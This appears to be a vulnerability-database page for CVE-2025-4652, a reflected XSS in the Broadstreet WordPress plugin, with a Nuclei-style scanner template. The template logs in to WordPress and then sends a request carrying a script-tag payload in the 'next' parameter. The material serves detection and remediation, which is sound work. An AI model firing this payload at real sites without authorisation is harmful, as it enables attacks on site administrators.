Broadstreet WordPress plugin - Reflected XSS

CVE-2025-4652
Verified

Description

The Broadstreet WordPress plugin before 1.51.8 contains a reflected XSS: a parameter is output without being sanitised or escaped, letting attackers execute scripts against high-privilege users such as admins. Exploitation requires victim interaction.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0%

Affected Product

broadstreet

Published Date

February 11, 2026

Template Author

sourabh-sahu

CVE-2025-4652.yaml
id: CVE-2025-4652

info:
  name: Broadstreet WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Broadstreet WordPress plugin < 1.51.8 contains a reflected XSS caused by unsanitised and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires victim interaction.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to session hijacking or privilege abuse.
  remediation: |
    Update to version 1.51.8 or later.
  reference:
    - https://wpscan.com/vulnerability/2a18ab96-ba95-4599-824f-df12e4851e6d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-4652
    cwe-id: CWE-79
    epss-score: 0.00342
    epss-percentile: 0.57388
    cpe: cpe:2.3:a:broadstreetads:broadstreet:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: broadstreetads
    product: broadstreet
  tags: cve,cve2025,broadstreetads,broadstreet,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/broadstreet/Broadstreet/Vendor/broadstreet-partner/index.php?action=register&id=123&next="/><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","broadstreet")
        condition: and
# digest: 4a0a00473045022100f0c0718c2190b63ecd26b4f4f8afde210c06d888e24f3ec214009d6217ad838f02207ed076add6245f1bc9403fb66e4572c07a9beb15ff4e12a1eb3344e7acfb032a:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2025-4652
CWE ID: CWE-79

References

https://wpscan.com/vulnerability/2a18ab96-ba95-4599-824f-df12e4851e6d/

Remediation Steps

Update to version 1.51.8 or later.